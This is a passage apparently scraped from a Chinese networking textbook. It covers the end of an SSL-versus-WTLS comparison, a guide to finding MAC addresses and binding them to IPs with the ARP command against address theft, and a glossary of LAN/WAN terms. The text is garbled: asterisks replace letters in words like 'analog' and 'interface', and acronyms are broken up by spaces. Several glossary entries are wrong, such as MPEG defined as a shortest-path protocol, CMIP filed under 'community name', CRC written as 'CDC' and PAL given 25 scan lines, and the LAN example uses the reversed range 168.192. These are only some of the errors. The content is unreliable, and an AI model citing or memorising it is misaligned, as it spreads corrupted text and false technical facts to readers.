，而且与原有体制并不兼容，关于这点有文章[7]做了精彩阐述，可参看）。

这里我简单举一些SSL与WTLS的差别。

1 WTLS在一般udp这类不可靠信道之上工作，因此每个消息里要有序列号，协议里

也要靠它来处理丢包，重复等情况。

此外，拒绝服务攻击也因此变得更加容易。

2 WTLS建立的安全连接是在wap网关和手持设备之间，wap网关和web server之间

如果也要保密，便要采再用SSL，即在这种模型中无法实现端到端的加密。

———- ————- ———

| Mobile |———–>| WAP |———->| WEB |

| Device |<———–| Gateway |<———-|Server |

| | WTLS | | SSL | |

———- ————- ———

3 WTLS协议里加了一种成为key_refresh的机制,当传递了一定数量数据包后，双

方通过同样的算法将自己的密钥做一下更新。付出了很小的代价，安全性得以增

强。

参考文献

[1] SSL 3.0 SPECIFICATION

http://home.netscape.com/eng/ssl3/

[2] TLS

http://www.ietf.org/rfc/rfc2246.txt

[3] 《应用密码学》

机械工业出版社

[4] The End of SSL and SSH?

http://securityportal.com/cover/coverstory20001218.html

[5] HTTP Over TLS

http://www.ietf.org/rfc/rfc2818.txt

[6] HTTP Upgrade to TLS

http://www.ietf.org/rfc/rfc2817.txt

[7] W* Effect Considered Harmful

http://www.4k-associates.com/IEEE-L7-WAP-BIG.html

[8] 智能卡数字加密技术

http://www.yicard.com/cardtech/smartcard/jiami/index.htm

[9] HMAC: Keyed-Hashing for Message Authentication

http://www.ietf.org/rfc/rfc2104.txt

关于MAC地址和IP地址的知识

在校园网络中，最方便的捣乱方法就是盗用别人的IP地址，被盗用IP地址的计算

机不仅不能正常使用校园网络，而且还会频繁出现IP地址被占用的提示对话框，

给校园网络安全和用户应用带来极大的隐患。捆绑IP地址和MAC地址就能有效地避

免这种现象。

　　何为MAC地址

　　网卡在使用中有两类地址，一类是大家都熟悉的IP地址，另一类就是MAC地址

，即网卡的物理地址，也称硬件地址或链路地址，这是网卡自身的惟一标识，就

仿佛是我们的身份证一样，一般不能随意改变。它与网络无关，无论把这个网卡

接入到网络的什么地方，MAC地址都是不变的。其长度为48位二进制数，由12个00

~0FFH的16进制数组成，每个16进制数之间用”-“隔开，如”00-10-5C-AD-72-E3

“。

(本章完)

[(第33章 ＭＡＣ地址)]

如何查找MAC地址

　　1、在Windows 9x/2000/XP下单击”开始/程序”，找到”MS-DOS方式”或”

命令提示符”。

　　2、在命令提示符下输入：”Ipconfig/all”，回车后出现如附图所示的对话

框，其中的”Physical Address”即是所查的MAC地址。

　　如何捆绑MAC地址和IP地址

　　进入”MS-DOS方式”或”命令提示符”，在命令提示符下输入命令：ARP – s

10.88.56.72 00-10-5C-AD-72-E3，即可把MAC地址和IP地址捆绑在一起。

　　这样，就不会出现IP地址被盗用而不能正常使用校园网络的情况（当然也就

不会出现错误提示对话框），可以有效保证校园网络的安全和用户的应用。

　　注意：ARP命令仅对局域网的上网代理服务器有用，而且是针对静态IP地址，

如果采用Modem拨号上网或是动态IP地址就不起作用。ARP命令的各参数的功能如

下：

　　ARP -s -d -a

　　-s：将相应的IP地址与物理地址的捆绑，如本文中的例子。

　　-d：删除相应的IP地址与物理地址的捆绑。

　　-a：通过查询ARP协议表显示IP地址和对应物理地址情况。

3.IP地址和物理地址成对被盗用是怎么回事?

比如，在局域网中，由主机自动分配IP地址，或自己指定IP地址，

自动分配时，先开主机，然后下面的再开的机子自动分配IP为168.192.0.2，

168.192.0.3。。。依此推下去，或自己指定IP，如，主机（1号机）为

168.192.0.1，2号机为168.192.0.2，依此推下去，

在局域网络里，IP地址分配好的情况下，比如，我现在做的是5号机，本来IP应该

是168.192.0.5，但我在设置指定IP时，改为168.192.0.2，这样，就等于说，占

用了2号机的IP，当2号机再启动时，就会出现提示说IP被占用，无法连接网络，

造成上不了网或网络共享访问，简单来讲就是这样了

解决的方法，就是把，那个IP和本机的网卡MAC地址捆绑，让别的占用不成

 

(本章完)

[(第34章 org术语表1)]

? 1 0 0 B a s e – V G或者1 0 0 V G – A n y L A N—使用需求优先权传输数据包的一种速率为

1 0 0 M b p s的通信技术。

? 1 0 0 B a s e – X—1 0 0 M b p s的快速以太网标准，使用C S M A / C D访问方法进行通信，具体说

明见标准IEEE 802.3u。

A

? access server （访问服务器）—访问服务器是将同步设备和异步设备连接到网络、并为

同步通信和异步通信提供路由技术的一个单元。

? active hub （有源电缆接头）—有源电缆接头是在星形拓扑结构中连接结点的一种网络

传输设备，每当数据信号通过集线器时，可以对其进行重建、重定时和放大。

? Address Resolution Protocol （地址解析协议, ARP）—一种基于T C P / I P的协议，利用该

协议，发送结点可以确定接收结点的M A C地址。

? American National Standards Institute （美国国家标准协会, ANSI）—这是致力于为各种

产品（包括网络设备）建立标准的组织。

? American Standard Code for Information Interchange （ 美国信息交换标准码, ASCII）—

一种8位字符编码的方法，由9 6个大写字母、小写字母和数字另加3 2个非打印字符组成。

? **og （模拟）—模拟是一种可以连续变化的各种类型的传输，如正电压和负电压的电

波。

? A p p l e Ta l k—对等协议，用于网络上多台M a c i n t o s h计算机之间的通信。

? application-specific integrated circuit （专用集成电路, ASIC）—在芯片上定制的集成电

路，其中包括特殊的逻辑功能，如快速路由逻辑。

? Asynchronous Transfer Mode （异步传输模式, AT M ）—采用信元、多通道和交换在同一

网络上发送音频、视频和数据传输的传输方法。

? ATM attached device （AT M附属设备）—将数据流转换为AT M信元流，或者将AT M信元

流转换成数据流的设备。

? ATM Forum （AT M论坛）—与ITU T一起，致力于AT M的L A N和WA N应用规范制定的

硬件供应商、电信服务提供商以及用户的联盟。

? ATM permanent virtual circuit （AT M永久虚拟电路, PVC）—一个专用电路，在两个指

定端点之间具有预先配置的路径一个固定分配的带宽。

? ATM switch （AT M交换器） — 一个交换器，以AT M分层通信的方式对信元传输进行操

作。

? ATM switched virtual circuit （AT M转换虚拟电路, SVC）—为分立的通信任务建立并使

用的电路，当该任务完成时，则拆卸该电路。

? attachment unit inte**ce （连接单元接口, AUI）—是一种网络接口，用来将同轴电缆、

双绞线或光纤主干电缆连接到网络结点如集线器、交换机或工作站上。接口由连接器、

电缆、接口回路和电气特性的A U I标准组成。

? attenuation （衰减）—当信号沿通信介质从源（传输结点）发送到接收结点时，丢失的信

号量。

? Audio Video Interleave （音频视频交错, ** I ）—** I是一种声频和视频文件格式，为

Microsoft Windows 3.1或更高环境下的应用而开发。** I对那些准备复制为短小的”片”

的视频和音频数据进行隔行扫描。

B

? backbone （主干）—一种高容量的通信介质，用于连接同一层、不同层或跨越长距离的

网络。

? backbone cabling （主干布线）—根据E I A / T I A – 5 6 8标准的定义，主干电缆为在网络设备

室、楼层和建筑物用的电缆。

? band rate （波特率）—波特率衡量数据传输速率，用来描述老式调制解调器的速度，在

一次信号振荡时发出一个数据位。

? bandwidth （带宽）—带宽指通信介质的传输能力，通常以每秒多少位（数据传输）或赫兹

（对于数据、音频和视频传输）来衡量，并由最大传输能力减去最小传输能力决定。

? baseband （基带）—基带是一种传输类型。在基带传输中，通信介质（如电缆）的整个通

道容量只被一个数据信号使用，从而在一定时间只有一个结点用于传输。

? Basic Rate Inte**ce for ISDN （ISDN基本速率接口, BRI）—一种I S D N接口，由三个信

道组成。其中两个6 4 K b p s的信道用于传输数据、语音、视频和图形。第三个1 6 K b p s信

道用于传输信令。

? batch （批处理）—不需要用户或其他计算机系统干预的一个接一个的一系列处理过程。

处理大量数据或一系列复杂功能的计算机的维护工作通常采用这种方式，而且这种工作

通常是在夜间进行的。

? bayonet nut connector （同轴电缆接插件, BNC）—用于细同轴电缆，有一个卡销一样的

套。Male BNC有两个旋钮，插在female BNC的环形槽中。连接时，两个接插件要绞在

一起。

? beaconing （信标）—信标是令牌环网中的错误状态，表明有一个或一个以上的结点出现

操作异常。

? bidirectional interpolation （双向插补）—双向插补是一种视频压缩技术，在序列中影象

的前后影象里都存在与当前影象相同的部分，可以通过创建指向这部分的指针来压缩

帧。

? bits per second （比特/秒, bps）—比特/秒是每秒发送的二进制位（ 0或1 ）的个数。

? bridge （网桥）—网桥是将使用相同的访问手段的不同局域网段连接在一起的网络传输

设备。例如，使用网桥将一个以太局域网连接到另一个以太局域网，或将令牌环局域网

连接到另一个令牌环局域网上。

? bridge protocol data unit （网桥协议数据单元, BPDU）—B P D U是网桥所用的专门的帧，

用来彼此间交换信息。

术语表计计295

? broadband （宽带）—这种传输中，通信介质上有多个传输通道，允许在同一时刻有多

个结点进行传输。

? broadband ISDN （宽带ISDN, B-ISDN）—当前正处于开发之中，该技术可以提供

1 5 5 M b p s或者更高的数据传送速率。

? broadcast storm （广播扰动）—当大量的计算机或设备要同时传输时，或者当计算机或

设备都要进行重复传输，网络流量超负荷就会引起网络带宽饱和，称之为广播扰动。

? brouter （桥式路由器）—桥式路由器是充当网桥或路由器的一种网络设备，具体是充当

网桥还是路由器，则要根据它转发给定协议的方法而定。

? buffering （缓存）—缓存是一种设备，例如交换机，在存储器中临时存储信息的能力。

? bus （总线）—总线是计算机中用来传输数据的一条路径，例如，在C P U和连接在计算

机上的外设之间的通道。

? bus topology （总线结构）—总线结构是从一台P C或文件服务器连接到另一台的网络设

计，就像链上的链接那样。

C

? cable plant （电缆线路）—用来构成网络的所有的通信电缆的数量。

? cableco—有线电视公司，如T C I。

? carrier sense （载波侦听）—载波侦听是检验通信介质如电缆等以确定电压级别、信号转

换等的过程，通过载波侦听可以说明网络上是否出现了载有数据的信号。

? Carrier Sense Multiple Access with Collision Detection （带有冲突检测的载波侦听多路存

取, C**A/CD）—C S M A / C D是以太网中使用的一种网络传输控制方法。它通过检查包

冲突来调整传输。

? cell （信元）—是用于高速传输的格式化数据单元，经常用在AT M中。

? cell switching （信元交换） — 一种使用T D M和虚拟通道的转换方式，在每一个T D M时

间片的开头都放置一个简短的指示器或虚拟通道标识符。

? Challenge Handshake Authentication Protocol 难题握手鉴定协议（ C H A P ）— 用于对口令

加密的协议，例如在一个WA N上传输的服务器帐户口令。

? channel bank （信道组）—信道组是在一个集中的位置组合了通信信道（如T- 1 ）的大规模

多路转接器。

? channel service unit （通道服务器, CSU）—这种设备是在网络设备（如路由器）和T载波线

路之间的一个物理接口。

? circuit switching （电路交换）—电路交换技术是一种网络通信技术，采用专用的信道在

两个结点间传输信息。

? Classical IP over ATM （AT M上的经典IP） — AT M上I P的传输，一个严格集中于I P支持

的技术。

? Classless Interdomain Routing （无类别域间路由, CIDR）—一种新的I P编址方法，该方

法忽略了地址的类别设计，在点分十进制地址的后面使用一条斜线，用以指明可用地址

的总数目。

? coaxial cable （同轴电缆）—同轴电缆是一种网络电缆介质，由被绝缘层包围的铜芯组

成。绝缘层又被另外的传导材料如编织导线包围，传导材料又由外层的绝缘材料覆盖。

? collision （冲突）—冲突是在以太网上同时检测到两个或多个包时的状态。

? community name （公用名）—网络代理和网络管理工作站使用的一个口令，其作用是不

让它们的通信被未经授权的工作站或者设备轻易截取。

? community name （公共管理接口协议, CMIP）—该协议是O S I网络管理标准的一部分，

用以收集网络性能数据。

? Compressed Serial Line Internet Protocol （压缩串行线路互连网协议, CSLIP）— S L I P远

程通信协议的扩展，能够提供比S L I P更快的吞吐量。

? computer network （计算机网络）—计算机网络是由通信电缆或无线电波链接的计算机、

打印机设备、网络设备和计算机软件系统。

? concentrator （集中器）—集中器是可以让多个输入和输出同时活动的设备。

? connection-oriented service （面向连接的服务）—这是在L L C子层和网络层间进行的

Type 2操作，提供了多种途径来保证接收结点成功地接收到了数据。

? connectionless service （无连接服务）—无连接服务也就是常说的Type 1操作，是L L C子

层和网络层间的服务，但是这里不能检测数据是否已经确实到达了接收结点。

? current-state encoding （当前状态编码）—这是一种数字信号编码方法，这里，对某信号

状态分配一个二进制值，例如+ 5 v电压为二进制值1，0 v为二进制值0。

? cut-through switching （开通式交换）—通过开通式交换这种交换技术在整个帧到达之前

来转发帧的一部分。

? cyclic redundancy check （循环码校验, CDC）—C D C为一种错误校验方法，这种方法中

要计算包含在帧中的整个信息域的大小，计算出来的值由发送结点的数据链接层插入到

靠近帧尾的位置，并又接收结点的数据链接层进行校验，以确定是否出现了传输错误

 

(本章完)

[(第35章 术语表（2）)]

D

? data circuit equipment （数据电路设备, DCE）—在X . 2 5网络上，D C E指的是一个分组交

换机或者P D N访问设备。

? data link connection identifier （数据链路连接标识, DLCI）—在帧中继网络上用以标识

单个的虚拟连接。

? Data Link Control （数据链路控制, DLC）—设计用于与一个I B M大型机或微型机通信的

协议，它使用S N A通信。

? data service unit （数据服务器, DSU）—与C S U共同使用的一种设备，用于T载波线路上

的通信。D S U为接收网络而转换在线路上传输和接收的数据。

? data terminal equipment （数据终端设备, DTE）—在X . 2 5网络上，D T E是指运行在分组

交换网络上的终端、工作站、服务器和主计算机等。不管实际使用的设备到底是什么，

有时都将D T E设备称为终端。

? data warehouse （数据仓库）—一种数据库访问技术，这种技术将一个主机数据库（例如，

大型机上的数据库）复制到另外一个数据库服务器上，目的是为了能够在不中断主机数

据库的情况下创建报表或者浏览数据，一般情况下可以允许使用点击型报表编写工具。

? datagram （数据报）—X . 2 5的一种传输模式，在这种模式下，没有使用特殊的通信信道，

常常导致数据不能以它们发送时的顺序到达，因为每一个数据报可能会沿不同的路径到

达目的地。

? demand priority （需求优先权）—一种数据通信技术，这种技术可以直接将信息包传送

给目标结点，在传输过程中只经过一个集线器，无需经过其他的网络结点。

? dense wavelength division multiplexing （密集波分多路复用, DWDM）—一种新出现的多

路复用技术，该技术使用单模光纤，可以在一条光缆上建立多个路径同时进行数据传输。

? digital （数字式）—这是一种传输方法，其中不同的信号级都用二进制表示，如二进制0

和1分别代表0 v和+ 5 v。

? digital subscriber line （数字用户线路, DSL）—一种使用高级调制技术的技术，该技术

可以在用户和电话公司之间通过已有的电信网络形成高速的网络连接，其通信速度可以

高达6 0 M b p s。

? discovery （发现）—发现是路由器采用的一个过程，包括采集诸如网络上有多少个结点

以及结点的位置等信息。

? Distance Vector Multicast Routing Protocol （距离向量广播路由协议, DVMRP）—

D V M R P是一种与R I P共同工作的多点广播（也称多点传送）协议，可确定哪个工作站被预

定给了多点传送。

? Domain Name Service （域名服务, DNS）—一种T C P / I P应用协议，该协议可以将计算机

的域名转换为I P地址，或者将I P地址转换为域名。

? dotted decimal notation （点分十进制表示法）—一种编址技术，该技术将四个8位字节，

例如1 0 0 0 0 11 0 . 11 0 111 1 0 . 11 0 0 1 0 11 . 0 0 0 0 0 1 0 1 ，转换成十进制表示（ 例如，

1 3 4 . 2 2 2 . 1 0 1 . 0 0 5 ），用以标识网络和网络上的单个主机。

? d r i v e r （驱动程序）—驱动程序是一种软件，可使计算机与N I C、打印机、显示器和硬盘

驱动器进行通信。每一个驱动程序都有其特定的目的，例如，处理以太网通信。

? dynamic addressing （动态编址）—一种编址方法，在这种方法中，无需网络管理员将I P

地址”硬编码”在设备的网络配置中便可以实现I P地址的分配。

? Dynamic Host Configuration Protocol （动态主机配置协议, DHCP）—一种网络协议，通

过D H C P，服务器可以自动地将一个I P地址分配给其网络上的某个设备。

? dynamic routing （动态路由）—在动态路由这种路由进程中，路由器不停地检查网络的

配置，自动更新路由表，并自己来决定如何路由包。

E

? electromagnetic interference （电磁干扰, EMI）—电磁干扰是马达等电力设备引起的磁力

场产生的信号干扰。

? electronic data interchange （电子数据交换, EDI）—使用电子方法在计算机或电话网络

上传输商业、组织和个人数据。

? Electronic Industries Alliance （电子工业联合会, EIA）—这是发展网络布线标准和电子

接口标准的标准化组织。

? encapsulation （封装）—封装是在网络间转换帧的过程。在这一进程中，要将一种类型

的网络的数据帧放入另一网络使用的头部，使得新的头的作用如同发信时的信封。

? enterprise network （企业网）—企业网是L A N、M A N或WA N的组合，为计算机用户提

供一系列计算机和网络资源，以完成各种工作。

? Ethernet （以太网）—以太网是使用C S M A / C D访问方法进行网络数据传输的一种传输系

统。以太网一般是通过总线或总线—星型拓扑结构实施的。

? Extended Binary Coded Decimal Interchange Code （扩充二进制编码十进制交换码,

E B C D I C ）—这是一种主要用于I B M大型机的字符编码技术，对2 5 6个字母、数字和特

殊字符组成的字符集进行8位编码。

? E x t r a n e t—一种用WA N链路连接两个或者多个I n t r a n e t所形成的网络。

F

? farm （群）—放置在同一个地方的一组计算机主机（例如大型机）或服务器或两者都有，

例如放置在一个机房内。

? Fast Ethernet （快速以太网）—传输速度在1 0 0 M b p s的以太网通信，其详细说明见标准

IEEE 802.3u。

? fat pipe （粗管）—用于网络主干（如在建筑物的楼层间）以进行高速通信的光纤电缆。

? Fiber Distributed Data Inte**ce （光纤分布式数据接口, FDDI）—F D D I是一种光纤数据

传输方法，采用的拓扑结构为双环拓扑，其传输速度可达1 0 0 M b p s。

? f i b e r-optic cable （光纤电缆）—光纤电缆是一种通信电缆，由两个或多个玻璃或塑料光

纤芯组成，这些光纤芯位于保护性的覆层内，由塑料P V C外部套管覆盖。沿内部光纤进

行的信号传输一般使用红外线。

? File Transfer Protocol （文件传输协议, FTP）—一种T C P / I P应用协议，该协议以批数据

流的方式传输文件，是一种在I n t e r n e t上广泛使用的协议。

? firewall （防火墙）—防火墙是用来保护数据免受外界访问的软件或硬件，也可以防止网

络中数据泄露到外面。

? firmware （固件）—固件是一种存储在R O M等设备的芯片上的软件。

? flow control （流控制）—流控制过程用来确保设备发送信息时的速度不高于接收设备的

接收速度。

? fractal image compression （不规则图象压缩）—不规则图象压缩是一种视频压缩技术，

利用不规则图象片、复制图象和映射的特性来压缩帧。

? frame （帧）—有时”帧”一词可以与”包”交换使用，但帧指的是网络上传输的数据单

元，其中包含与开放系统互连（ O S I ）的数据链接层（即第2层）相应的控制信息和地址信息。

? frame relay （帧中继）—一种通信协议，使用分组交换和虚拟电路技术进行分组传输，

该技术通过将大量的差错检验功能留给中间结点，可以获得较高的数据传输速率。

? frequency-division multiple access （ 频分多路访问技术, FDMA）—频分多重访问技术在

一种通信介质上通过给每一个信道确立不同的频率来创建不同的信道。

? full-duplex （全双工）—全双工是指可以同时发送、接收信号的能力。

G

? gateway （网关）—网关是一种网络设备，可使不同类型的网络间相互通信，如在复杂

的协议间或不同的E- m a i l系统间进行通信。

H

? half-duplex （半双工）—半双工是指可以发送接收信号、但不能同时进行的能力。

? hop （跳）—跳是帧或包从一个网络向另一个网络点对点的运动。

? horizontal cabling （水平布线）—根据E I A / T I A – 5 6 8标准的定义，水平布线为在同一工作

区域中连接工作站和服务器的布线。

? host （主机）—主机是具有操作系统的，多台计算机可同时访问其文件、数据和服务的

计算机（包括大型机、小型机、服务器或工作站）。程序和信息可在主机上进行处理，或

下载到访问计算机（客户机）上来处理。

? hub （集线器）—集线器是将各个单独的电缆段或单独的L A N连接在一起成为一个网络

的中央设备。

? hybrid fiber/coax （混合光纤/同轴, HFC）电缆—这种电缆由电缆护套组成，电缆护套中

包含着光纤和铜电缆的组合。

‘

I

? impedance （阻抗）—阻碍电流流动的总值。

? Institute of Electrical and Electronics Engineers （电气电子工程师协会, IEEE）—这是由

一群科学家、工程师、技术人员和教育家组成的组织，在开发网络布线和数据传输标准

方面起着领导作用。

? Integrated Services Digital Network （综合业务数字网, ISDN）—一种在电话线上传输数

据服务的网络标准，当前的实际速率为1 . 5 3 6 M b p s，理论上可以达到6 2 2 M b p s的传输速

率。

? Integrated Services Digital Network （综合服务数字网, ISDN）—I S D N是在电话线上用

信道的组合来传递音频、数据和视频服务的WA N技术。

? International Organization for Standardization （国际标准化组织, ISO）—I S O是一国际组

织，致力于建立通信和网络标准，其最为突出、广为人知的贡献是建立了网络协议标

准。

? International Telecommunications Union （国际通信联盟, I T U ）—I T U是国际上致力于规

定远程通信标准的组织，例如，它为调制解调器和WA N通信制订了标准。

? Internet Engineering Task Force （ Internet工程任务组, IETF）—I E T F是I S O C的左膀右

臂，致力于与Internet 相关的技术问题。

? Internet Function （互连功能, IWF） — 一个标准，为在AT M上实现帧中继提供重新映射

及封装功能。

? Internet Group Management Protocol （互联网分组管理协议, IGMP）—在多点传送中使

用的协议，其中含有接收用户的地址，服务器使用它来通知路由器哪一个工作站属于多

点传送组。

? Internet —Internet 是由许许多多网络设备和多种通信方法链接的成千上万的小型网络

的集合。

下载

? Internet Packet Exchange （网间包交换, IPX）— 由N o v e l l开发的用在它的N e t Wa r e文件

服务器操作系统上的协议。

? Internet Protocel（Internet 协议， I P ）—该协议与T C P或U D P结合使用，通过采用点分

十进制编址，使包到达本地或远程网络上的目标地点。。

? Internet Society （Internet 协会, ISOC）—I S O C是一家非盈利的国际组织，主办会议和

出版物，并监督Internet 标准的执行。

? internetworking （网络互连）—网络互连是将相同或不同类型的网络连接在一起以便相

互通信的过程。

? I n t r a n e t—某个公司组织的私有网络，在该网络中，可以和I n t e r n e t一样使用相同的基

于We b的网络工具，但是对公众的访问有严格的限制。I n t r a n e t通常由一个L A N上的一个

或者多个子网或者V L A N组成。

J

? jamming （阻塞）—交换机使用的一种数据流量控制技术，用来指示由于大量数据引起

的交换机过载。在这种方式中，交换机通过倍增载波信号来模拟冲突。

? jitter （抖动）—抖动是网络上延迟不定的具体表现，抖动会在声频重放时引起明显的错

误，如播放声频时的杂音等。

? Joint Photographic Experts （联合图像专家组, JPEG）压缩—J P E G压缩是使用有失真压

缩技术的压缩标准，由I S O和I T U – T专为静态图像制订

 

(本章完)

[(第36章 术语表（3）)]

L

? LAN Emulation （LAN仿真, LANE）—用于使AT M适应于以太网的技术，它创建一个多

点传送的网络，使得预先配置的以太网结点组能够接收传输。

? LAN emulation （局域网仿真）—局域网仿真是一种网络集成方法，用以在相连的L A N

上格式化所有的包以与AT M通信单元（信元）的外型匹配。

? latency （延迟）—延迟是指网络信息从传输设备发送到接收设备所用的时间。

? line-to-line （视线传输）—视线传输是一种无线电信号传输的类型，其中，信号从一点

向另一点传输，而不是在大气中弹跳，从而可以跨越国家或洲的界限。

? local area network （局域网, LAN）—局域网是一系列互连的计算机、打印设备和其他计算

机设备，它们之间共享硬件和软件资源。局域网通常仅限于给定办公地点、楼层或大楼中。

? local bridge （本机桥）—本机桥是连接临近网络的网络设备，可以用来将网络的一部分

分段以缓解网络流量繁忙的问题。

? local management inte**ce extension （局部管理接口扩展）—添加在帧中继帧上的扩展，

可以提供附加的功能，例如多点传送。

? local router （本地路由器）—本地路由器是在同一座大楼或临近的大楼之间（例如在同一

商业区）连接网络的一种路由器。

? Logical link control （逻辑链路控制, LLC）—这是O S I模型的数据链接子层，用来发起

结点间的通信链接，确保链接不会无意识地中断。

? lossy compression （有失真压缩）—有失真压缩是一种压缩图像的方法，它删除一定百

分比的颜色，使得当图像解压缩时，肉眼不会观察到颜色中细微的变化。

? low earth orbiting satellites （低轨卫星, LEO）—一种通信卫星网络，这种通信卫星距离

地面的高度大约在4 3 5到1 0 0 0英里之间。

M

? Management Information Base （管理信息库, MIB）—存储网络性能信息的数据库，该

数据库被存放在网络代理上，可以从网络管理工作站上进行访问。

? Manchester encoding （曼彻斯特编码）—这是一种状态转换编码形式，其中，从低向高

的转换为二进制0，高向低转换为二进制1。

? media access control （介质存取控制, MAC）—这是数据链接层的子层，用来检查网络

帧中包含的地址信息，并控制同一网络上设备共享通信的方式。

? meshed architecture （网络体系）—一种网络体系，其中有多个备用网络路径，如果一

个路径失效，发送设备会自动地重新路由到另外一个路径，不需要用户干预。

? message switching （报文交换）—这种交换方法将数据从一点发送到另一点，每一个中间

结点都可存储数据、等待闲置的传输信道，并在到达目的地后，将数据提交给下一个点。

? metric （度量）—度量是由路由器计算出来的，反映了有关特定传输途径的信息，如路

径长度、下一跳的负载、可用的带宽和路径可靠性等。

? metropolitan area network （城域网, MAN）—城域网是在一大型城市或地区链接多个

L A N的网络。

? Microcom Network Protocol （Microcom网络协议, MNP）—M N P是一套调制解调器的服

务级别，可以提供有效的通信、错误校验、数据压缩和高输入输出总和等能力。

? modem （调制解调器）—调制解调器将计算机输出的数字信号转换为电话线路可以传输

的模拟信号，然后在接收端将输入的模拟信号转换为计算机可以理解的数字信号。

? Moving Open Shortest Path First Protocol （运动图像专家组, MPEG）压缩—M P E G是由

I S O中的M P E G建立的视频压缩标准。

? multicast （多点传送）—一种传输方法，在这种方法中，服务器将需要一个特定多媒体

传输的用户组合成一组。每个数据流只发送一次，但是到达多个地址，而不是分别给每

个地址发送一次数据。

? Multicast Open Shortest Path First Protocol （广播开放最短路径优先协议, MOSPF）—

M O S P F是一种多点广播路由协议，在为多点广播传输寻找从源到目标的最短路径时，

与O S P F相仿。

? multiple system operator（MSO）—这是提供WA N或Internet 服务的一家有线电视公司。

? multiplexer （多路器）—多路器是一种转换器，将一种通信介质分成多个通道，从而结

点可以同时进行通信。当信号被多路传送时，在另一端也必须要多路转换。

? Multiprotocol over ATM （AT M上的多协议, MPOA）—一种通信技术，使得多协议的通

信量能够在AT M上选择路由。

? multistation access unit （多站访问部件, MAU）—M A U是将许多令牌环结点链接到一个

在物理上很像星型结构的拓扑结构上的中央集线器，但在M A U中，包在逻辑上是以环

形结构进行传输的。

302计计局域网/广域网的设计与实现

下载

? multistation access unit （多站访问部件, MAU）—多站访问部件将令牌环结点链接到一

个物理上像星形但数据信号在逻辑的环形上传输的一种拓扑结构上。

N

? National Television Standards Committee （国家电视制式委员会, NTSC）—N T S C是为电

视广播传输建立标准的一个组织。由N T S C制订的电视信号传输标准利用了5 2 5条垂直扫

描线，每秒可传输3 0个帧。

? NetBIOS Extended User Inte**ce （NetBIOS扩展用户接口, NetBEUI）— 由I B M在8 0年

代中期开发，此协议集成了N e t B I O S，用于在网络上进行通信。

? Network Basic Input/Output System （网络基本输入/输出系统, NetBIOS）— 将软件与网

络服务相接口的方法，包括提供为工作站和服务器提供一个网络命名惯例。

? Network Control Protocol （网络控制协议, NCP）—A R PA N E T网络协议，其使用要早于

T C P / I P，但是其功能逐渐被T C P / I P取代。

? Network Device Inte**ce Specification （网络驱动程序接口规范, NDIS）—由微软为网

络驱动器开发的一系列标准，使得一个N I C和一个或多个协议进行通信成为可能。

? Network File System （网络文件系统, NFS）Protocol—T C P / I P文件传输协议，该协议使

用记录流而不是使用成批文件流来传输信息。

? Network Node Inte**ce （网络结点接口, NNI）—一个AT M接口，用于两个AT M交换机

之间的连接，有时候也称为网络到网络的接口。

? network traffic （网络信息流通量）—网络信息流通量是指给定时间内，网络上传输的包

的数量、大小和频率。

? Next Hop Resolution Protocol （下一转发分辨协议, NHRP）— 一个协议，当多个网络通

过AT M连接时，它使得一个网络上的发送结点能够判断出要使用的数据链路层的地址，

以便到达另一个网络上的目标结点。

? Open Database Connectivity （开放数据库互连, ODBC）—由微软开发的一种数据库访问

规则和过程，其目的是作为所有类型的关系数据库的一个标准。

? Open Datalink Inte**ce （开放数据链路接口, ODI）— 由Novell NetWa r e使用的驱动器，

用于在多个网络上传输多个协议。

? Open document Architecture （开放文档体系结构, ODA）—O D A是I S O的标准，是为综

合包含文本、图像、声音和其他表示模式的专门格式化的文档而制订的。

? Open Shortest Path First （开放最短路径优先, OSPF）—开放最短路径优先是路由器采用

的一种路由协议，用来与其他路由器交流有关到其他结点的直接链接等信息。

? Open Systems Interconnection （开放系统互连, OSI）—O S I由I S O和A N S I开发，是一个7

层的模型，为网络上的硬件和软件通信提供一种体制。

术语表计计303

304计计局域网/广域网的设计与实现

下载

? packet （包）—包是为方便在网络上传输而格式化了的数据单元，其中含有与O S I网络

层（即第3层）相应的控制信息及其他信息。

? packet assembler/disassembler （分组组装/拆装器, PA D ）—一种将分组封装为X . 2 5格式

并且添加X . 2 5地址信息的设备。当分组到达其目的L A N之后，PA D会把X . 2 5格式信息去

掉。

? packet radio （无线电分组通信）—以短脉冲串的形式通过无线电波传输带有数据的包的

过程。

? packet switching （包交换）—包交换是一种数据传输技术，它在两个传输结点之间建立

起一个逻辑信道，并不停地在许多不同的路径之间发现到达目的地的最好的路由路径。

? partition （分区）—分区即在段的一部分出现故障时关闭电缆段。

? passive hub （无源插孔）—无源插孔是用来以星形拓扑结构连接结点的一种网络传输设

备，当数据信号通过集线器从一个结点传到另一个结点时，不执行信号放大。

? Password Authentication Protocol （口令验证协议, PA P ）—当在一个WA N上访问一个服

务器或宿主计算机时，用于验证帐户口令的协议。

? peer protocols （对等协议）—用来使发送结点的O S I模型的各层与相应的接收结点层进

行通信的协议。

? permanent virtual circuit （永久虚拟电路, PVC）—一种通信信道，一直处于连接状态，

不管该结点是否在进行通信。

? phase alternation line （逐行倒相, PA L ）—PA L是一种电视传输标准，主要用在非洲、欧

洲、中东和南美洲，它采用了2 5条垂直扫描线，每秒传输2 5帧。

? plain old telephone service （简易老式电话业务, POTS）—规则的语音级电话业务。

? plenum area （高压电缆）—这是一种用特氟纶做套的电缆，由于它在燃烧时不会放射有

毒的气体，所以经常用在高压地区。

? plenum area （高压地区）—高压地区是封闭的地区，其间的大气压要比外界的气压高，

尤其在燃烧时更是如此。建筑物中的高压地区经常可以发展到多个房间或在整个楼层中

蔓延，高压地带包括通风和加热管道。

? Point-to-Point （点到点协议, PPP）— 一个广泛使用的远程通信协议，支持I P X / S P X、

N e t B E U I以及T C P / I P通信。

? power budget （功率分配）—对于光纤电缆通信，功率分配是发送功率和接收器的敏感

性之间的差别，以分贝来衡量。这是信号可以被发送并完好地接受所需要的最小的发送

器功率和接收器敏感性。

? predicted encoding （预测编码）—预测编码是一种视频压缩技术，帧的前一帧具有与其

相同的图像部分，可创建指向这一部分的指针来压缩帧。

? Primary Rate Inte**ce ISDN （ISDN主速率接口, PRI）—I S D N的一种接口，由多个速率

为1 . 5 3 6 M b p s的交换式通信组成。

? primitive （原语）—原语是将O S I协议栈某层的信息传输到另一层（如从物理层传到数据

链接层）的命令。

? Private Network-to-Network Inte**ce（私有网络到网络接口, PNNI）—一个AT M路由选

择协议，最通常使用在与S V C的连接上。

? private automated branch exchange （专用自动交换机, PA B X ）—专用自动交换机是一种

专用的自动的电话系统，，但是仍然保留有人工电话总机控制板。

